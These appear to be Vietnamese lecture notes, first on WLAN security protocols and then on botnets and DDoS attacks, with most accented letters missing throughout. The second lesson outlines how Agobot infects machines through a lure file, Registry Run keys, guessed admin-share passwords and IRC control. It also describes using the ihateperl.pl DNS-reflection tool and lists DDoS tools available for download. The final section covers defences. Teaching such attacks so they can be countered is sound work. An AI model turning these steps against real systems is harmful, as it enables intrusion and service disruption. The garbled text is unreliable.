Bi 1

Cc phng thc bo mt mng WLAN

Vi gi thnh xy dng mt h thng mng WLAN gim,ngy cng c
nhiu cng ty s dng.iu ny s khng th trnh khi vic Hacker chuyn sang
tn cng v khai thc cc im yu trn nn tng mng s dng chun 802.11.
Nhng cng c Sniffers cho php tm c cc gi tin giao tip trn mng, h c
th phn tch v ly i nhng thng tin quan trng ca bn. Vy bn bit g v
cc phng thc bo mt mng WLAN.
Nhng phn mm scan c th c ci t trn cc thit b nh Smart Phone hay
trn mt chic Laptop h tr chun kt ni Wi-Fi.

iu ny dn ti nhng thng tin nhy cm trong h thng mng, nh thng

tin c nhn ca ngi dng
Nhng nguy c bo mt trong WLAN bao gm:

 Cc thit b c th kt ni ti nhng Access Point ang broadcast SSID.

Hacker s c gng tm kim cc phng thc m ho ang c s dng trong
qu trnh truyn thng tin trn mng, sau c phng thc gii m ring v ly
cc thng tin nhy cm.
Ngi dng s dng Access Point ti gia nh s khng m bo tnh bo mt
nh khi s dng ti doanh nghip.
bo mt mng WLAN, bn cn thc hin qua cc bc sau:

Ch c nhng ngi dng c xc thc mi c kh nng truy cp vo mng

thng qua cc Access Point.
Cc phng thc m ho c p dng trong qu trnh truyn cc thng tin quan
trng.
Bo mt cc thng tin v cnh bo nguy c bo mt bng h thng IDS v IPS.
Xc thc v bo mt d liu bng cch m ho thng tin truyn trn mng.
IDS nh mt thit b gim st mng Wireless v mng Wire tm kim v
cnh bo khi c cc du hiu tn cng.
2

Ban u, IEEE 802.11 s dng gii php bo mt bng nhng kho tnh
(static keys) cho c qu trnh m ho v xc thc. Phng thc xc thc nh vy l
khng mnh, cui cng c th b tn cng. Bi v cc kho c qun l v
khng thay i, iu ny khng th p dng trong mt gii php doanh nghip ln
c.
Cisco gii thiu v cho php s dng IEEE 802.1x l giao thc xc thc v
s dng kho ng (dynamic keys), bao gm 802.1x Extensible Authentication
Protocol (EAP). Cisco cng gii thiu phng thc chng li vic tn cng
bng cch s dng qu trnh bm (hashing) (Per Packet Key PPK) v Message
Integrity Check (MIC). Phng thc ny c bit n nh Cisco Key Integrity
Protocol (CKIP) v Cisco Message Integrity Check (CMIC).

Cc t chc chun 802.11 bt u tin hnh vic nng cp bo mt cho mng

WLAN. Wi-Fi Alliance gii thiu gii php WPA (Wi-Fi Protected Access). Mt
chun nm trong chun 802.11i l chun bo mt ca WLAN v s dng chun
802.1x lm phng thc xc thc v m ho d liu. WPA c s dng cho vic
xc thc ngi dung, MIC, Temporal Key Integrity Protocol (TKIP), v Dynamic
Keys. N tng t nh phng thc ca Cisco nhng cch thc hin c khc i
cht. WPA cng bao gm mt passphrase hay preshared key cho ngi dung h
xc thc trong gii php bo mt trong gia nh, nhng khng c s dng cho
gii php doanh nghip.
3

Ngy nay , IEEE 802.11i nng cp v Advanced Encryption Standard

(AES) thay th cho WEP v l phng thc bo mt mi nht v bo mt nht
trong m ho d liu. Wireless IDS hin nay c vi vai tr nhn din v bo v
h thng WLAN trc nhng tn cng. Wi-Fi Alliance 802.11i lm vic v s
dng nh WPA2
Cc Access Point gi broadcast mt hoc nhiu SSIDs, hay data rates, v
mt s thng tin. Cc thit b Wi-Fi c th scan tt c cc knh v tm truy cp vo
bt k mng no m h scan ra c t nhng Access Point. Client s thng kt
ni ti nhng Access Point m tn hiu mnh nht. Nu tn hiu yu, client tip tc
scan ti mt Access Point khc (trong trng hp Roaming). Trong qu trnh kt
ni, SSID, a ch MAC v cc thit lp bo mt c gi t client ti Access
Point v kim tra bi Access Point.

Ngi dung c xc thc thong qua giao thc 802.1x. Vi chun 802.1x
hay EAP cn thit trn WLAN client. Access Point cng c th nh mt my ch
p ng vic xc thc cho ngi dng, hoc c th lien kt ti my ch RADIUS
nh xc thc h, hoc c th lm vic vi Cisco Secure ACS. Lightweight Access
Pont s giao tip vi WLAN controller, v n lm vic nh mt my ch xc cung
cp xc thc cho cc users.
Client v my ch cung cp xc thc trin khai vi hai phin bn EAP khc nhau.
Thng tin EAP s c truyn t Access point ti my ch xc thc
4

Sau khi xc thc song WLAN client, d liu s c m ho trc khi

truyn i. V c bn phng thc m ho da vo thut ton RC4 c s dng
bt u t WEP. TKIP s dng m ho RC4 c tng cng bo mt hn v vi
nhiu bt m ho hn v c kho tch hp cho mi packet (key per packet PPK).
AES c thay th cho RC4 vi thut ton bo mt cao cp hn. WPA s dng
TKIP, trong khi WPA2 s dng AES hay TKIP.

S khc nhau gia cc dng WLANs.

Cho cc im truy cp t ng (hotspots), vic m ho khng cn thit,

ch cn ngi dung xc thc m thi.
5

 Vi ngi dng s dng mng WLAN cho gia nh, mt phng thc bo
mt vi WPA passphare hay preshared key c khuyn co s dng.
Vi gii php doanh nghip, ti u qu trnh bo mt vi 802.1x EAP
lm phng thc xc thc v TKIP hay AES lm phng thc m ho. c da
theo chun WPA hay WPA2 v 802.11i security.

Bo mt mng WLAN cng tng t nh bo mt cho cc h thng mng

khc. Bo mt h thng phi c p dng cho nhiu tng, cc thit b nhn dng
pht hin tn cng phi c trin khai. Gii hn cc quyn truy cp ti thiu cho
nhng ngi dng cn thit. D liu c chia s v yu cu xc thc mi cho
php truy cp. D liu truyn phi c m ho.
K tn cng c th tn cng mng WLAN khng bo mt bt c lc no. Bn cn
c mt phng n trin khai hp l.

 Phi c lng c cc nguy c bo mt v cc mc bo mt cn

thit p dng.
nh gi c ton b cc giao tip qua WLAN v cc phng thc bo
mt cn c p dng.
nh gi c cc cng c v cc la chn khi thit k v trin khai mng
WLAN.
Theo VNE Research Deparment
So snh cc phng thc bo mt da trn vic chng thc
I Bo mt bng WEP (Wired Equivalent Privacy)
WEP l mt thut ton bo nhm bo v s trao i thng tin chng li s
nghe trm, chng li nhng ni kt mng khng c cho php cng nh chng li
vic thay i hoc lm nhiu thng tin truyn. WEP s dng stream cipher RC4
cng vi mt m 40 bit v mt s ngu nhin 24 bit (initialization vector IV)
m ha thng tin. Thng tin m ha c to ra bng cch thc hin operation
XOR gia keystream v plain text. Thng tin m ha v IV s c gi n ngi
nhn. Ngi nhn s gii m thng tin da vo IV v kha WEP bit trc. S
m ha c miu t bi hnh 1.

Hnh 1: S m ha bng WEP

Nhng im yu v bo mt ca WEP
+ WEP s dng kha c nh c chia s gia mt Access Point (AP) v
nhiu ngi dng (users) cng vi mt IV ngu nhin 24 bit. Do , cng mt IV
s c s dng li nhiu ln. Bng cch thu thp thng tin truyn i, k tn cng
c th c thng tin cn thit c th b kha WEP ang dng.

+ Mt khi kha WEP c bit, k tn cng c th gii m thng tin

truyn i v c th thay i ni dung ca thng tin truyn. Do vy WEP khng
m bo c confidentiality vintegrity.
+ Vic s dng mt kha c nh c chn bi ngi s dng v t khi
c thay i (tc c ngha l kha WEP khng c t ng thay i) lm cho
WEP rt d b tn cng.
+ WEP cho php ngi dng (supplicant) xc minh (authenticate) AP trong
khi AP khng th xc minh tnh xc thc ca ngi dng. Ni mt cch khc, WEP
khng cung ng mutual authentication.
II. Bo mt bng WPA (Wifi Protected Access )
WPA l mt gii php bo mt c ngh bi WiFi Alliance nhm khc
phc nhng hn ch ca WEP. WPA c nng cp ch bng mt update phn
mm SP2 ca microsoft .
WPA ci tin 3 im yu ni bt ca WEP :
+ WPA cng m ha thng tin bng RC4 nhng chiu di ca kha l 128
bit v IV c chiu di l 48 bit. Mt ci tin ca WPA i vi WEP l WPA s
dng giao thc TKIP (Temporal Key Integrity Protocol) nhm thay i kha dng
AP v user mt cch t ng trong qu trnh trao i thng tin. C th l TKIP
dng mt kha nht thi 128 bit kt hp vi a ch MAC ca user host v IV
to ra m kha. M kha ny s c thay i sau khi 10 000 gi thng tin c
trao i.
+ WPA s dng 802.1x/EAP m bo mutual authentication nhm chng
li man-in-middle attack. Qu trnh authentication ca WPA da trn mt
authentication server, cn c bit n vi tn gi RADIUS/ DIAMETER. Server
RADIUS cho php xc thc user trong mng cng nh nh ngha nhng quyn
ni kt ca user. Tuy nhin trong mt mng WiFi nh (ca cng ty hoc trng
hc), i khi khng cn thit phi ci t mt server m c th dng mt phin bn
WPA-PSK (pre-shared key). tng ca WPA-PSK l s dng mt password
(Master Key) chung cho AP v client devices. Thng tin authentication gia user
v server s c trao i thng qua giao thc EAP (Extensible Authentication
Protocol). EAP session s c to ra gia user v server r chuyn i thng tin
lin quan n identity ca user cng nh ca mng. Trong qu trnh ny AP ng
vai tr l mt EAP proxy, lm nhim v chuyn giao thng tin gia server v user.
Nhng authentication messages chuyn i c miu t trong hnh 2.

Hnh 2: Messages trao i trong qu trnh authentication.

+ WPA s dng MIC (Michael Message Integrity Check ) tng cng
integrity ca thng tin truyn. MIC l mt message 64 bit c tnh da trn thut
tan Michael. MIC s c gi trong gi TKIP v gip ngi nhn kim tra xem
thng tin nhn c c b li trn ng truyn hoc b thay i bi k ph hoi
hay khng. Tm li, WPA c xy dng nhm ci thin nhng hn ch ca WEP
nn n cha ng nhng c im vt tri so vi WEP. u tin, n s dng mt
kha ng m c thay i mt cch t ng nh vo giao thc TKIP. Kha s
thay i da trn ngi dng, session trao i nht thi v s lng gi thng tin
truyn. c im th 2 l WPA cho php kim tra xem thng tin c b thay i
trn ng truyn hay khng nh vo MIC message. V c im ni bt th cui
l n cho php multual authentication bng cch s dng giao thc 802.1x
9

Nhng im yu ca WPA
im yu u tin ca WPA l n vn khng gii quyt c denial-ofservice (DoS) attack [5]. K ph hoi c th lm nhiu mng WPA WiFi bng cch
gi t nht 2 gi thng tin vi mt kha sai (wrong encryption key) mi giy. Trong
trng hp , AP s cho rng mt k ph hoi ang tn cng mng v AP s ct
tt c cc ni kt trong vng mt pht trch hao tn ti nguyn mng. Do , s
tip din ca thng tin khng c php s lm xo trn hot ng ca mng v
ngn cn s ni kt ca nhng ngi dng c cho php (authorized users).
Ngoi ra WPA vn s dng thut tan RC4 m c th d dng b b v bi
FMS attack ngh bi nhng nh nghin cu trng i hc Berkeley [6]. H
thng m ha RC4 cha ng nhng kha yu (weak keys). Nhng kha yu ny
cho php truy ra kha encryption. c th tm ra kha yu ca RC4, ch cn thu
thp mt s lng thng tin truyn trn knh truyn khng dy.
WPA-PSK l mt bin bn yu ca WPA m n gp vn v qun l
password hoc shared secret gia nhiu ngi dng. Khi mt ngi trong nhm
(trong cng ty) ri nhm, mt password/secret mi cn phi c thit lp.
III. Tng cng bo mt vi chun 802.11i (WPA2)
Chun 802.11i c ph chun vo ngy 24 thng 6 nm 2004 nhm tng
cng tnh mt cho mng WiFi. 802.11i mang y cc c im ca WPA. Tp
hp nhng giao thc ca 802.11i cn c bit n vi tn gi WPA 2. Tuy nhin,
802.11i s dng thut ton m ha AES (Advanced Encryption Standard) thay v
RC4 nh trong WPA. M kha ca AES c kch thc l 128, 192 hoc 256 bit.
Tuy nhin thut ton ny i hi mt kh nng tnh ton cao (high computation
power). Do , 802.11i khng th update n gin bng software m phi c mt
dedicated chip. Tuy nhin iu ny c c tnh trc bi nhiu nh sn xut
nn hu nh cc chip cho card mng Wifi t u nm 2004 u thch ng vi tnh
nng ca 802.11i.
Bi 2 Tn cng DDoS
Ni dung s trnh by ni dung chi tit v mng Bot, cc dng mng Bot v
cch to ra mng Botnet. Khi hiu v mng Botnet bn c th hnh dung ra phng
thc tn cng DDoS chi tit cc phng thc tn cng DDoS cc thc hin cc
phng thc tn cng ny. Nhng bi vit ny ch c tc dng gip cc bn hiu
bit su v tn cng DDoS m thi, cc tools gii thiu ch mang tnh gii thiu v
n l cc tools DDoS c.
Mng BOT NET
10

1. ngha ca mng BOT

- Khi s dng mt Tool tn cng DoS ti mt my ch i khi khng gy
nh hng g cho my ch - Gi s bn s dng tool Ping of Death ti mt my
ch, trong my ch kt ni vi mng tc 100Mbps bn kt ni ti my ch
tc 3Mbps - Vy tn cng ca bn khng c ngha g.
- Nhng bn hy tng tng c 1000 ngi nh bn cng mt lc tn cng
vo my ch kia khi ton b bng thng ca 1000 ngi cng li ti a t
3Gbps v tc kt ni ca my ch l 100 Mbps vy kt qu s ra sao cc bn c
kh nng tng tng.
- Nhng ti ang th hi lm cch no c 1000 my tnh kt ni vi
mng ti i mua mt nghn chic v thu 1000 thu bao kt ni - chc chn ti
khng lm nh vy ri v cng khng k tn cng no s dng phng php ny
c.
- K tn cng xy dng mt mng gm hng nghn my tnh kt Internet (c
mng BOT ln ti 400.000 my). Vy lm th no chng c kh nng li dng
ngi kt ni ti Internet xy dng mng BOT trong bi vit ny ti s gii
thiu vi cc bn cc mng BOT v cch xy dng, nhng Tool xy dng.
- Khi c trong tay mng BOT k tn cng s dng nhng tool tn cng n
gin tn cng vo mt h thng my tnh. Da vo nhng truy cp hon ton
hp l ca h thng, cng mt lc chng s dng mt dch v ca my ch, bn
th tng tng khi k tn cng c trong tay 400.000 my ch v cng mt lc ra
lnh cho chng download mt file trn trang web ca bn. V chnh l DDoS
Distributed Denial of Servcie
- Khng c mt phng thc chng tn cng DDoS mt cch hon ton
nhng trong bi vit ny ti cng gii thiu vi cc bn nhng phng php phng
chng DDoS khi chng ta hiu v n.
2. Mng BOT
- BOT t vit tt ca t RoBOT
- IRCbot cn c gi l zombia hay drone.
- Internet Relay Chat (IRC) l mt dng truyn d liu thi gian thc trn
Internet. N thng c thit k sao cho mt ngi c th nhn c cho mt
group v mi ngi c th giao tip vi nhau vi mt knh khc nhau c gi l
Channels.
- u tin BOT kt ni knh IRC vi IRC Server v i giao tip gia
nhng ngi vi nhau.
11

- K tn cng c th iu khin mng BOT v s dng mng BOT cng nh

s dng nhm mt mc ch no .
- Nhiu mng BOT kt ni vi nhau ngi ta gi l BOTNET botnet.
3. Mng Botnet.
- Mng Botnet bao gm nhiu my tnh
- N c s dng cho mc ch tn cng DDoS
- Mt mng Botnet nh c th ch bao gm 1000 my tnh nhng bn th
tng tng mi my tnh ny kt ni ti Internet tc ch l 128Kbps th mng
Botnet ny c kh nng to bng thng l 1000*128 ~ 100Mbps y l mt
con s th hin bng thng m kh mt nh Hosting no c th share cho mi trang
web ca mnh.
4. Mc ch s dng mng Botnets
- Tn cng Distributed Denial-of-Service - DDoS
+ Botnet c s dng cho tn cng DDoS
- Spamming
+ M mt SOCKS v4/v5 proxy server cho vic Spamming
- Sniffing traffic
+ Bot cng c th s dng cc gi tin n sniffer (tm c cc giao
tip trn mng) sau khi tm c cc gi tin n c gng gii m gi tin ly c
cc ni dung c ngha nh ti khon ngn hng v nhiu thng tin c gi tr khc
ca ngi s dng.
- Keylogging
+ Vi s tr gip ca Keylogger rt nhiu thng tin nhy cm ca
ngi dng c th s b k tn cng khai thc nh ti khon trn e-banking, cng
nh nhiu ti khon khc.
- Ci t v ly nhim chng trnh c hi
+ Botnet c th s dng to ra mng nhng mng BOT mi.
- Ci t nhng qung co Popup
+ T ng bt ra nhng qung co khng mong mun vi ngi s
dng.
-

Google Adsense abuse

12

+ T ng thay i cc kt qu tm kim hin th mi khi ngi dng s

dng dch v tm kim ca Google, khi thay i kt qu n s la ngi dng kch
vo nhng trang web nguy him.
- Tn cng vo IRC Chat Networks
+ N c gi l clone attack
- Phishing
+ Mng botnet cn c s dng phishing mail nhm ly cc thng
tin nhy cm ca ngi dng.
5. Cc dng ca mng BOT.
Agobot/Phatbot/Forbot/XtremBot
- y l nhng bot c vit bng C++ trn nn tng Cross-platform v m
ngun c tm trn GPL. Agobot c vit bi Ago nick name c ngi ta bit
n l Wonk, mt thanh nin tr ngi c b bt hi thng 5 nm 2004 vi
ti danh v ti phm my tnh.
- Agobot c kh nng s dng NTFS Alternate Data Stream (ADS) v nh
mt loi Rootkit nhm n cc tin trnh ang chy trn h thng
SDBot/Rbot/UrBot/UrXbot
- SDBot c vit bng ngn ng C v cng c public bi GPL. N c
coi nh l tin thn ca Rbot, RxBot, UrBot, UrXBot, JrBot
mIRC-Based Bots GT-Bots
- GT c vit tt t fhai t Global Threat v tn thng c s dng cho
tt c cc mIRC-scripted bots. N c kh nng s dng phn mm IM l mIRC
thit lp mt s script v mt s on m khc.
6. Cc bc xy dng mng BotNet? Cch phn tch mng Bot.
hiu hn v xy dng h thng mng BotNet chng ta nghin cu t
cch ly nhim vo mt my tnh, cch to ra mt mng Bot v dng mng Bot
ny tn cng vo mt ch no ca mng Botnet c to ra t Agobots.
Bc 1: Cch ly nhim vo my tnh.
- u tin k tn cng la cho ngi dng chy file "chess.exe", mt
Agobot thng copy chng vo h thng v s thm cc thng s trong Registry

13

m bo s chy cng vi h thng khi khi ng. Trong Registry c cc v tr cho

cc ng dng chy lc khi ng ti.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
Bc 2: Cch ly lan v xy dng to mng BOTNET
- Sau khi trong h thng mng c mt my tnh b nhim Agobot, n s t
ng tm kim cc my tnh khc trong h thng v ly nhim s dng cc l hng
trong ti nguyn c chia s trong h thng mng.
- Chng thng c gng kt ni ti cc d liu share mc nh dnh cho cc
ng dng qun tr (administrator or administrative) v d nh: C$, D$, E$ v print$
bng cch on usernames v password c th truy cp c vo mt h thng
khc v ly nhim.
- Agobot c th ly lan rt nhanh bi chng c kh nng tn dng cc im
yu trong h iu hnh Windows, hay cc ng dng, cc dch v chy trn h
thng.
Bc 3: Kt ni vo IRC.
- Bc tip theo ca Agobot s to ra mt IRC-Controlled Backdoor m
cc yu t cn thit, v kt ni ti mng Botnet thng qua IRC-Controll, sau khi
kt ni n s m nhng dch v cn thit khi c yu cu chng s c iu
khin bi k tn cng thng qua knh giao tip IRC.
Bc 4: iu khin tn cng t mng BotNet.
- K tn cng iu khin cc my trong mng Agobot download nhng
file .exe v chy trn my.
- Ly ton b thng tin lin quan v cn thit trn h thng m k tn cng
mun.
- Chy nhng file khc trn h thng p ng yu cu ca k tn cng.
- Chy nhng chng trnh DDoS tn cng h thng khc.
7. S cch h thng b ly nhim v s dng Agobot.

14

VII. Cc tools tn cng DDoS

1. Nuclear Bot.
- Nuclear Bot l mt tool cc mnh "Multi Advanced IRC BOT" c th s
dng Floods, Managing, Utilities, Spread, IRC Related, tn cng DDoS v
nhiu mc ch khc.

15

VIII. Tn cng DDoS

Trn Internet tn cng Distributed Denial of Service l mt dng tn cng t

nhiu my tnh ti mt ch, n gy ra t chi cc yu cu hp l ca cc user bnh
thng. Bng cch to ra nhng gi tin cc nhiu n mt ch c th, n c th
gy tnh trng tng t nh h thng b shutdown.
2. Cc c tnh ca tn cng DDoS.
- N c tn cng t mt h thng cc my tnh cc ln trn Internet, v
thng da vo cc dch v c sn trn cc my tnh trong mng botnet
- Cc dch v tn cng c iu khin t nhng "primary victim" trong khi
cc my tnh b chim quyn s dng trong mng Bot c s dng tn cng
thng c gi l "secondary victims".
- L dng tn cng rt kh c th pht hin bi tn cng ny c sinh ra t
nhiu a ch IP trn Internet.
- Nu mt a ch IP tn cng mt cng ty, n c th c chn bi
Firewall. Nu n t 30.000 a ch IP khc, th iu ny l v cng kh khn.
- Th phm c th gy nhiu nh hng bi tn cng t chi dch v DoS,
v iu ny cng nguy him hn khi chng s dng mt h thng mng Bot trn
internet thc hin tn cng DoS v c gi l tn cng DDoS.
16

3. Tn cng DDoS khng th ngn chn hon ton.

- Cc dng tn cng DDoS thc hin tm kim cc l hng bo mt trn cc
my tnh kt ni ti Internet v khai thc cc l hng bo mt xy dng mng
Botnet gm nhiu my tnh kt ni ti Internet.
- Mt tn cng DDoS c thc hin s rt kh ngn chn hon ton.
- Nhng gi tin n Firewall c th chn li, nhng hu ht chng u n
t nhng a ch IP cha c trong cc Access Rule ca Firewall v l nhng gi tin
hon ton hp l.
- Nu a ch ngun ca gi tin c th b gi mo, sau khi bn khng nhn
c s phn hi t nhng a ch ngun tht th bn cn phi thc hin cm giao
tip vi a ch ngun .
- Tuy nhin mt mng Botnet bao gm t hng nghn ti vi trm nghn a
ch IP trn Internet v iu l v cng kh khn ngn chn tn cng.
4. K tn cng khn ngoan.
Gi y khng mt k tn cng no s dng lun a ch IP iu khin
mng Botnet tn cng ti ch, m chng thng s dng mt i tng trung gian
di y l nhng m hnh tn cng DDoS
a. Agent Handler Model
K tn cng s dng cc handler iu khin tn cng

b. Tn cng DDoS da trn nn tng IRC

K tn cng s dng cc mng IRC iu khin, khuych i v qun l
kt ni vi cc my tnh trong mng Botnet.
17

IX. Phn loi tn cng DDoS

- Tn cng gy ht bng thng truy cp ti my ch.
+ Flood attack
+ UDP v ICMP Flood (flood gy ngp lt)
- Tn cng khuch i cc giao tip
+ Smurf and Fraggle attack
Tn cng DDoS vo Yahoo.com nm 2000

18

S phn loi tn cng DDoS

S tn cng DDoS dng Khuch i giao tip.

Nh cc bn bit tn cng Smurf khi s dng s Ping n a ch Broadcast
ca mt mng no m a ch ngun chnh l a ch ca my cn tn cng, khi
ton b cc gi Reply s c chuyn ti a ch IP ca my tnh b tn cng.

19

X. Tn cng Reflective DNS (reflective - phn chiu).

a. Cc vn lin quan ti tn cng Reflective DNS
- Mt Hacker c th s dng mng botnet gi rt nhiu yu cu ti my
ch DNS.
- Nhng yu cu s lm trn bng thng mng ca cc my ch DNS,
- Vic phng chng dng tn cng ny c th dng Firewall ngn cm
nhng giao tip t cc my tnh c pht hin ra.
- Nhng vic cm cc giao tip t DNS Server s c nhiu vn ln. Mt
DNS Server c nhim v rt quan trng trn Internet.
- Vic cm cc giao tip DNS ng ngha vi vic cm ngi dng bnh
thng gi mail v truy cp Website.
- Mt yu cu v DNS thng chim bng 1/73 thi gian ca gi tin tr li
trn my ch. Da vo yu t ny nu dng mt Tools chuyn nghip lm tng
cc yu cu ti my ch DNS s khin my ch DNS b qu ti v khng th p
ng cho cc ngi dng bnh thng c na.
b. Tool tn cng Reflective DNS ihateperl.pl

20

- ihateperl.pl l chng trnh rt nh, rt hiu qu, da trn kiu tn cng

DNS-Reflective
- N s dng mt danh sch cc my ch DNS lm trn h thng mng
vi cc gi yu cu Name Resolution.
- Bng mt v d n c th s dng google.com resole gi ti my ch
v c th i tn domain thnh www.vnexperts.net hay bt k mt trang web
no m k tn cng mun.
- s dng cng c ny, rt n gin bn to ra mt danh sch cc my
ch DNS, chuyn cho a ch IP ca my c nhn v thit lp s lng cc giao
tip.
XI. Cc tools s dng tn cng DDoS.
Trong ton b cc tools ti gii thiu trong bi vit ny hu ht l cc tools
c v khng hiu qu, v ch mang tnh cht s phm cc bn c th hiu v
dng tn cng DDoS hn m thi. Di y l cc Tools tn cng DDoS.
Trinoo - Tribe flood Network (TFN) - Trinity -

TFN2K - Stacheldraht -

Shaft

Knight - Mstream - Kaiten

Cc tools ny bn hon ton c th Download min ph trn Internet v lu

l ch th y l cc tools yu v ch mang tnh Demo v tn cng DdoS m
thi.

Tn cng t chi dch v - DDOS

Tn cng t chi dch v phn tn DDOS s lun l mi e do hng u n cc h thng cng ngh thng tin trn th
gii. V mt k thut, hu nh chng ta ch c th hy vng tin tc s dng nhng cng c bit v c hiu bit km c
v cc giao thc c th nhn bit v loi tr cc traffic gy nn cuc tn cng. Mt iu m cc chuyn gia ai cng
tha nhn, l nu DDOS c thc hin bi mt tin tc c trnh th vic phng trnh l khng th. Cch y 4 nm
gii hacker chnh quy th gii khai t k thut tn cng ny v chm dt mi hot ng nghin cu trnh din hay ph
tn cng c, do chnh bn thn h cng nhn thy mc nguy him v khng cng bng ca kiu tn cng ny. Vi m
h tng mng cng vi thng mi in t va chm hnh thnh, DDOS s l mt mi nguy hi rt ln cho Internet Vi
Nam.

Tn cng t chi dch v (DoS) l cuc tn cng trn h thng mng nhm ngn cn nhng truy xut ti mt dch v nh
l WEB, Email, Tn cng DoS ph hu dch v mng bng cch lm trn ngp s lng kt ni, qu ti server hoc
chng trnh chy trn server, tiu tn ti nguyn ca server, hoc ngn chn ngi dng hp l truy nhp ti cc dch v
mng.

C rt nhiu cc phng cch thc hin cc cuc tn cng t chi dch v v th cng c rt nhiu cch phn loi cc

21

kiu tn cng t chi dch v DoS. Cch phn loi ph bin thng dng da vo giao thc trong hnh thc tn cng
DoS, v d nh trn ngp ICMP vi Smurf, Ping of Death, khai thc im yu ca TCP trong hot ng ca giao thc v
phn mnh gi tin vi SYN flood, LanD attacks, TearDrop, hay cc ng dng lp ng dng nh vi Flash Crowds (hay
tn gi khc l X-flash).

Phn loi theo phng thc tn cng, DoS c th c thc hin bng mt vi gi tin n l gi thng ti server gy r
lon hot ng (nh slammer worm), hoc kch hot gi t nhiu ngun (tn cng t chi dch v phn tn DdoS). Tn
cng c th thc hin trn mng Internet (s dng ngay cc web server), hoc broadcast trong mng t bn trong (inside
attacks nh vi Blaster worm), trn cc mng ngang hng P2P (P2P index poinsioning) hay Wireless (WLAN
authentication rejection attack-spoof sender). Tuy nhin, c th thy cc cch phn loi trn da ch yu vo cch nhn t
s pht sinh ngun tn cng v v th, khng h thng ho c phng thc phng trnh.

Mt cch chung nht, mt c quan hay t chc cn xem xt nhng c im sau y khi i ph vi cc mi e do v
DoS nh sau:
1.

Phng nga cc im yu ca ng dng (Application Vulnerabilities)

Cc im yu tng ng dng, v cc li trong chng trnh ng dng c th b khai thc gy li trn b m, dn

n dch v hoc ng dng b ngng hot ng. Li ch yu c tm thy trn cc ng dng chy trn h iu hnh ph
bin hin nay l Windows, trn cc chng trnh Webserver, DNS, hay SQL database. Cp nht cc bn v l mt trong
nhng yu cu quan trng cho vic phng nga cc im yu ca ng dng. Trong thi gian cha th cp nht v s l
cho ton b cc my tnh, h thng phi c bo v bng cc bn v o (virtual patch). Ngoi ra, h thng cn c bi
xem xt nhng yu cu trao i ni dung gia my cliet v server, nhm trnh cho server chu tn cng qua cc thnh
phn gin tip nh l SQL injection.
2.

Phng nga vic tuyn m zombie

Zombie (hay cn gi l daemons, slaves hoc agent) l cc i tng c li dng tr thnh thnh phn pht sinh
tn cng. Mt s trng hp in hnh nh l thng qua rootkit (mt dng phn mm c kch hot mi khi h thng
khi ng, trc c khi h iu hnh khi ng xong. Rootkit cho php ci mt file c thuc tnh n, mt tin trnh, hoc
mt ti khon ngi s dng ln h iu hnh. Rootkit c kh nng chn bt d liu t cc terminal, t cc kt ni mng
v t bn phm), hay cc thnh phn hot ng nh km trong email, hoc trang Web (v d nh s dng cc file jpeg
khai thc li ca phn mm x l nh, cc on m nh km theo file flash, hoc trojan ci t theo phising, hay thng
qua vic ly lan worm (Netsky, MyDoom, Sophos). phng chng, h thng mng cn c nhng cng c theo di v lc
b ni dung (content filtering) nhm ngn nga vic tuyn m zombie ca cc tin tc.

22

3.

Ngn nga knh pht ng tn cng s dng cng c

C rt nhiu cc cng c tn cng t chi dch v DoS, ch yu l tn cng t chi dch v phn tn DdoS nh l
TFN, TFN2000 (Trible Flood Network), tn cng da vo nguyn l hot ng ca cc giao thc nh l Smurf, UDP, SYN
hay ICMP (Trinoo cho UDP flood, Stacheldraht cho TCP ACK, TCP NULL, HAVOC, DNS flood, hoc trn ngp TCP v
packets headers ngu nhin. Cc cng c ny c c im l cn phi c cc knh pht ng zombie thc hin tn
cng ti mt my ch c th. H thng cn phi c cc cng c gim st v ngn nga cc knh pht ng .
4.

Ngn chn tn cng bng bng thng

Khi mt cuc tn cng DDoS c pht ng n thng c pht hin da trn s thay i ng k v bng thng
ca h thng mng. V d, mt h thng mng bnh thng c th c 80% lu lng l ca giao thc TCP, 20% lu lng
cn li l ca UDP. Thng k ny nu c thay i r rt c th l du hiu ca mt cuc tn cng DoS. V d nh, su
Slammer s lm tng lu lng UDP, trong khi su Welchi s to ra ICMP flood. Vic phn tn lu lng gy ra bi cc
su ny gy tc hi ln router, firewall, hoc h tng mng. H thng cn phi c cc cng c gim st v iu phi bng
thng nhm gim thiu tc hi ca tn cng dng ny.
5.

Ngn chn tn cng qua c ch SYN/ACK

SYN flood l mt trong nhng cch tn cng DoS c nht cn tn ti cho n thi im hin ti, nhng tc hi ca n
gy ra th khng gim. im cn bn phng nga cch tn cng DoS ny l kh nng kim sot c s lng yu
cu SYN/ACK trong c ch kt ni 3-way handshaking ca giao thc TCP ti h thng mng.
6.

Pht hin v ngn chn tn cng ti hn s kt ni

Bn thn cc server ch c th p ng c mt s lng nht nh cc kt ni ti n cng mt lc. Ngay bn thn

firewall (c bit vi cc firewall c tnh nng stateful inspection), th cc kt ni lun c gn lin vi bng trng thi c
gii hn dung lng. a phn cc cuc tn cng u sinh ra s lng cc kt ni o thng qua vic gi mo. phng
nga tn cng dng ny, h thng cn phn tch v chng c vic gi mo, v kim sot c s lng kt ni t m
ngun c th ti server.

23

7.

Pht hin v ngn chn tn cng ti hn tc thit lp kt ni

Mt trong nhng im m cc server thng b li dng l kh nng cc b m gii hn dnh cho tc thit lp k
ni, dn n qu ti khi phi chu s thay i t ngt v s lng kt ni. y, vic p dng b lc gii hn s
lng kt ni c mt vai tr rt quan trng. Mt b lc s xc nh ngng tc kt ni cho tng thnh phn ca mng.

Trong mt h thng, i ph vi cc cuc tn cng t chi dch v, th thnh phn IPS c coi l quan trng nht
Cc cuc tn cng t chi dch v ch yu nhm vo kh nng x l ca h thng mng m u tin l cc thit b an ninh
mng. Nng lc x l ca IPS l mt trong nhng c im cn ch , c bit l s n nh trong vic x l ng thi cc
loi lu lng hn tp vi kch thc gi tin thay i.

24